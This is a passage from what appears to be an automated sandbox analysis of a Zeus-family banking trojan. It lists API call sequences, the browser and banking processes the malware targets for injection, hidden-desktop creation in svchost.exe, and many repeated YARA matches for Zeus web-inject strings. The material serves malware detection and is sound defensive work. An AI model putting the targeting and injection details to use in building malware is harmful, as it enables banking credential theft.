Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_014E1900
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014D3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014D3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014D3610
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BB95B0

System Summary

barindex
Source: 0.2.OjKmJJm2YT.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.883000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.841298.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.883000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.83b298.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.83b298.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2bb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.841298.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c13c00.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c13c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.888400.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2a56c00.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2a02000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.883000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2bb0000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.840698.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.883000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
